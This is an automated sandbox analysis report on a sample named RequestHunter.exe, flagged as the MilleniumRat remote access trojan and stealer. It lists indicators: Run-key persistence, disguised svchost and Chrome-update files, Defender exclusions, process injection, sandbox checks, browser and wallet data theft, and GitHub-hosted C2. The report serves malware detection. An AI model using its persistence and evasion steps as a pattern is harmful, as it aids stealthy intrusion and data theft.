milleniumrat | 4f89ae09799ff6f723b7894a33d5c013f6a1cfa733ad9a2ed5dcd1ad25413923

Analysis

max time kernel
198s
max time network
203s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
22-05-2024 16:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RequestHunter v2.2/RequestHunter.exe
Size

54.7MB
MD5

53bb2cf2e8c1e8806f25b561535db2db
SHA1

1f4291c281caf522fbb893d37158cf4081b3e838
SHA256

f7984e82b19075915ca8f29a41e513c8f1eb8f6e6a21871bd0cea33f3613a840
SHA512

c55ff92b60507b9a3ffbf4b0780f0c4c7c824a8b55aa1fb6005af685f840656d399c507114c137692f4003cea914319bdf4e7c3533c7d16cb76b1bbc408daec2
SSDEEP

1572864:jNHFnYOLV2XNx6QTDpsZCaOA+dVoaTjrMxyEOR/s:jznjyZmZzOA+Pv6AR/

Score

10^/10

milleniumrat discovery evasion execution persistence pyinstaller rat spyware stealer upx

Malware Config

Signatures

MilleniumRat
MilleniumRat is a remote access trojan written in C#.
rat stealer milleniumrat
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs

Processes:

WerFault.exe

description pid process target process

PID 5048 created 7692 5048 WerFault.exe Update.exe

description	pid	process	target process
PID 5048 created 7692	5048	WerFault.exe	Update.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs

Processes:

setup.exesvchost.exeupdater.exe

description	pid	process	target process
PID 5412 created 3420	5412	setup.exe	Explorer.EXE
PID 5412 created 3420	5412	setup.exe	Explorer.EXE
PID 5412 created 3420	5412	setup.exe	Explorer.EXE
PID 5412 created 3420	5412	setup.exe	Explorer.EXE
PID 5412 created 3420	5412	setup.exe	Explorer.EXE
PID 5412 created 3420	5412	setup.exe	Explorer.EXE
PID 4640 created 7692	4640	svchost.exe	Update.exe
PID 5124 created 3420	5124	updater.exe	Explorer.EXE
PID 5124 created 3420	5124	updater.exe	Explorer.EXE
PID 5124 created 3420	5124	updater.exe	Explorer.EXE
PID 5124 created 3420	5124	updater.exe	Explorer.EXE
PID 5124 created 3420	5124	updater.exe	Explorer.EXE
PID 5124 created 3420	5124	updater.exe	Explorer.EXE

Blocklisted process makes network request 2 IoCs

Processes:

curl.execurl.exe

flow pid process

56 2520 curl.exe
65 2968 curl.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

4992 powershell.exe
8492 powershell.exe
8376 powershell.exe
1020 powershell.exe
2332 powershell.exe
Contacts a large (1501) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

flow	pid	process
56	2520	curl.exe
65	2968	curl.exe

pid	process
4992	powershell.exe
8492	powershell.exe
8376	powershell.exe
1020	powershell.exe
2332	powershell.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

RequestHunter.exeRun.exeBuild.exes.exemain.exeUpdate.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	RequestHunter.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	Run.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	Build.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	s.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	main.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	Update.exe

Drops startup file 1 IoCs

Processes:

svchost.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe svchost.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe	svchost.exe

Executes dropped EXE 20 IoCs

Processes:

Run.exeRequestHunter.exeRequestHunter.exespotify.exespotify.exesvchost.exesvchost.exeBuild.exehacn.exebased.exebased.exehacn.exes.exemain.exesvchost.exesetup.exesvchost.exerar.exeUpdate.exeupdater.exe

pid	process
3200	Run.exe
3052	RequestHunter.exe
5092	RequestHunter.exe
3372	spotify.exe
2288	spotify.exe
1948	svchost.exe
2340	svchost.exe
1416	Build.exe
708	hacn.exe
4036	based.exe
3076	based.exe
4640	hacn.exe
3868	s.exe
3356	main.exe
5224	svchost.exe
5412	setup.exe
5808	svchost.exe
6236	rar.exe
7692	Update.exe
5124	updater.exe

Loads dropped DLL 64 IoCs

Processes:

RequestHunter.exespotify.exesvchost.exebased.exehacn.exe

pid	process
5092	RequestHunter.exe
5092	RequestHunter.exe
5092	RequestHunter.exe
5092	RequestHunter.exe
5092	RequestHunter.exe
5092	RequestHunter.exe
5092	RequestHunter.exe
5092	RequestHunter.exe
5092	RequestHunter.exe
5092	RequestHunter.exe
5092	RequestHunter.exe
5092	RequestHunter.exe
5092	RequestHunter.exe
5092	RequestHunter.exe
5092	RequestHunter.exe
2288	spotify.exe
2288	spotify.exe
2340	svchost.exe
2340	svchost.exe
2340	svchost.exe
2340	svchost.exe
2340	svchost.exe
2340	svchost.exe
2340	svchost.exe
2340	svchost.exe
2340	svchost.exe
2340	svchost.exe
2340	svchost.exe
2340	svchost.exe
2340	svchost.exe
2340	svchost.exe
2340	svchost.exe
2340	svchost.exe
2340	svchost.exe
2340	svchost.exe
2340	svchost.exe
2340	svchost.exe
2340	svchost.exe
2340	svchost.exe
2340	svchost.exe
2340	svchost.exe
2340	svchost.exe
2340	svchost.exe
2340	svchost.exe
2340	svchost.exe
2340	svchost.exe
2340	svchost.exe
2340	svchost.exe
2340	svchost.exe
2340	svchost.exe
2340	svchost.exe
2340	svchost.exe
2340	svchost.exe
2340	svchost.exe
2340	svchost.exe
2340	svchost.exe
2340	svchost.exe
2340	svchost.exe
2340	svchost.exe
2340	svchost.exe
3076	based.exe
3076	based.exe
4640	hacn.exe
4640	hacn.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 45 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\_MEI33722\python310.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI33722\_socket.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI33722\_lzma.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI33722\_hashlib.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI33722\_decimal.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI33722\_bz2.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI33722\unicodedata.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI33722\select.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI33722\libcrypto-1_1.dll	upx
behavioral1/memory/2288-151-0x00007FFD5C4E0000-0x00007FFD5C94E000-memory.dmp	upx
behavioral1/memory/2288-237-0x00007FFD5C4E0000-0x00007FFD5C94E000-memory.dmp	upx
behavioral1/memory/3076-331-0x00007FFD60C20000-0x00007FFD6108E000-memory.dmp	upx
behavioral1/memory/3076-333-0x00007FFD611C0000-0x00007FFD611CF000-memory.dmp	upx
behavioral1/memory/3076-332-0x00007FFD611D0000-0x00007FFD611F4000-memory.dmp	upx
behavioral1/memory/3076-342-0x00007FFD605D0000-0x00007FFD60741000-memory.dmp	upx
behavioral1/memory/3076-341-0x00007FFD60750000-0x00007FFD6076F000-memory.dmp	upx
behavioral1/memory/3076-340-0x00007FFD60770000-0x00007FFD60789000-memory.dmp	upx
behavioral1/memory/3076-339-0x00007FFD60790000-0x00007FFD607BD000-memory.dmp	upx
behavioral1/memory/3076-344-0x00007FFD605A0000-0x00007FFD605AD000-memory.dmp	upx
behavioral1/memory/3076-343-0x00007FFD605B0000-0x00007FFD605C9000-memory.dmp	upx
behavioral1/memory/3076-345-0x00007FFD60570000-0x00007FFD6059E000-memory.dmp	upx
behavioral1/memory/3076-347-0x00007FFD60130000-0x00007FFD601E8000-memory.dmp	upx
behavioral1/memory/3076-346-0x00007FFD601F0000-0x00007FFD60565000-memory.dmp	upx
behavioral1/memory/3076-352-0x00007FFD60AF0000-0x00007FFD60C08000-memory.dmp	upx
behavioral1/memory/3076-350-0x00007FFD61200000-0x00007FFD61214000-memory.dmp	upx
behavioral1/memory/3076-351-0x00007FFD60C10000-0x00007FFD60C1D000-memory.dmp	upx
behavioral1/memory/3076-1856-0x00007FFD60C20000-0x00007FFD6108E000-memory.dmp	upx
behavioral1/memory/3076-2017-0x00007FFD611D0000-0x00007FFD611F4000-memory.dmp	upx
behavioral1/memory/3076-2179-0x00007FFD60750000-0x00007FFD6076F000-memory.dmp	upx
behavioral1/memory/3076-2180-0x00007FFD605D0000-0x00007FFD60741000-memory.dmp	upx
behavioral1/memory/3076-2241-0x00007FFD611D0000-0x00007FFD611F4000-memory.dmp	upx
behavioral1/memory/3076-2249-0x00007FFD60570000-0x00007FFD6059E000-memory.dmp	upx
behavioral1/memory/3076-2248-0x00007FFD605A0000-0x00007FFD605AD000-memory.dmp	upx
behavioral1/memory/3076-2251-0x00007FFD60130000-0x00007FFD601E8000-memory.dmp	upx
behavioral1/memory/3076-2250-0x00007FFD601F0000-0x00007FFD60565000-memory.dmp	upx
behavioral1/memory/3076-2247-0x00007FFD605B0000-0x00007FFD605C9000-memory.dmp	upx
behavioral1/memory/3076-2246-0x00007FFD605D0000-0x00007FFD60741000-memory.dmp	upx
behavioral1/memory/3076-2245-0x00007FFD60750000-0x00007FFD6076F000-memory.dmp	upx
behavioral1/memory/3076-2244-0x00007FFD60770000-0x00007FFD60789000-memory.dmp	upx
behavioral1/memory/3076-2243-0x00007FFD60790000-0x00007FFD607BD000-memory.dmp	upx
behavioral1/memory/3076-2242-0x00007FFD611C0000-0x00007FFD611CF000-memory.dmp	upx
behavioral1/memory/3076-2240-0x00007FFD60C20000-0x00007FFD6108E000-memory.dmp	upx
behavioral1/memory/3076-2254-0x00007FFD60C10000-0x00007FFD60C1D000-memory.dmp	upx
behavioral1/memory/3076-2253-0x00007FFD61200000-0x00007FFD61214000-memory.dmp	upx
behavioral1/memory/3076-2252-0x00007FFD60AF0000-0x00007FFD60C08000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

svchost.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\кокершмидт = "C:\\ProgramData\\svchost.exe"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ChromeUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleChromeUpdateLog\\Update.exe"	reg.exe

Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Processes:

Explorer.EXE

description ioc process

File opened (read-only) \??\F: Explorer.EXE
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service
T1102

Processes:

flow ioc

81 raw.githubusercontent.com
82 raw.githubusercontent.com
88 raw.githubusercontent.com
174 raw.githubusercontent.com
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

32 api.ipify.org
33 api.ipify.org
68 ip-api.com
106 api.ipify.org

description	ioc	process
File opened (read-only)	\??\F:	Explorer.EXE

flow	ioc
81	raw.githubusercontent.com
82	raw.githubusercontent.com
88	raw.githubusercontent.com
174	raw.githubusercontent.com

flow	ioc
32	api.ipify.org
33	api.ipify.org
68	ip-api.com
106	api.ipify.org

Drops file in System32 directory 11 IoCs

Processes:

svchost.exepowershell.exeOfficeClickToRun.exesvchost.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

svchost.exe

pid process

5808 svchost.exe

pid	process
5808	svchost.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

setup.exeupdater.exe

description	pid	process	target process
PID 5412 set thread context of 6444	5412	setup.exe	dialer.exe
PID 5124 set thread context of 9188	5124	updater.exe	dialer.exe
PID 5124 set thread context of 6736	5124	updater.exe	dialer.exe
PID 5124 set thread context of 6844	5124	updater.exe	dialer.exe

Drops file in Program Files directory 1 IoCs

Processes:

setup.exe

description ioc process

File created C:\Program Files\Google\Chrome\updater.exe setup.exe
Drops file in Windows directory 1 IoCs

Processes:

svchost.exe

description ioc process

File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

8464 sc.exe
8852 sc.exe
8668 sc.exe
4712 sc.exe
5948 sc.exe
5972 sc.exe
6132 sc.exe
6068 sc.exe
5984 sc.exe
9148 sc.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\updater.exe	setup.exe

description	ioc	process
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe

pid	process
8464	sc.exe
8852	sc.exe
8668	sc.exe
4712	sc.exe
5948	sc.exe
5972	sc.exe
6132	sc.exe
6068	sc.exe
5984	sc.exe
9148	sc.exe

Detects Pyinstaller 4 IoCs

pyinstaller

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\spotify.exe	pyinstaller
C:\Users\Admin\AppData\Local\Temp\svchost.exe	pyinstaller
C:\ProgramData\Microsoft\hacn.exe	pyinstaller
C:\ProgramData\svchost.exe	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 8 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

RuntimeBroker.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	RuntimeBroker.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	RuntimeBroker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	RuntimeBroker.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	RuntimeBroker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	RuntimeBroker.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID	RuntimeBroker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	RuntimeBroker.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID	RuntimeBroker.exe

Checks processor information in registry 2 TTPs 11 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exeUpdate.exewmiprvse.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Update.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Update.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exe

pid process

9128 schtasks.exe
6392 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

7832 timeout.exe
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

1124 WMIC.exe
Enumerates processes with tasklist 1 TTPs 4 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exe

pid process

4692 tasklist.exe
4376 tasklist.exe
7940 tasklist.exe
2200 tasklist.exe

pid	process
9128	schtasks.exe
6392	schtasks.exe

pid	process
7832	timeout.exe

pid	process
1124	WMIC.exe

pid	process
4692	tasklist.exe
4376	tasklist.exe
7940	tasklist.exe
2200	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

wmiprvse.exeWerFault.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe

Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

948 systeminfo.exe

pid	process
948	systeminfo.exe

Modifies Internet Explorer settings 1 TTPs 10 IoCs

adware spyware

Modify Registry

T1112

Processes:

svchost.exeExplorer.EXE

description	ioc	process
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\94f9a6e2_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\4 = 0420000000000000180000000000000000000000000000000000803f0000803f	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\94f9a6e2_0	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\94f9a6e2_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\3 = 04000000000000000000803f000000000000000000000000	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\94f9a6e2_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\5 = 0b0000000000000000000000000000000000000000000000	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Internet Explorer\IESettingSync	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\94f9a6e2_0\ = "{2}.\\\\?\\hdaudio#func_01&ven_1af4&dev_0022&subsys_1af40022&rev_1001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\\elineouttopo/00010001\|\\Device\\HarddiskVolume2\\Program Files\\VideoLAN\\VLC\\vlc.exe%b{4533F59D-59EE-00C6-ADB2-C68B501A6655}"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\94f9a6e2_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}	svchost.exe

Modifies data under HKEY_USERS 60 IoCs

Processes:

powershell.exesvchost.exeOfficeClickToRun.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Wed, 22 May 2024 16:32:11 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
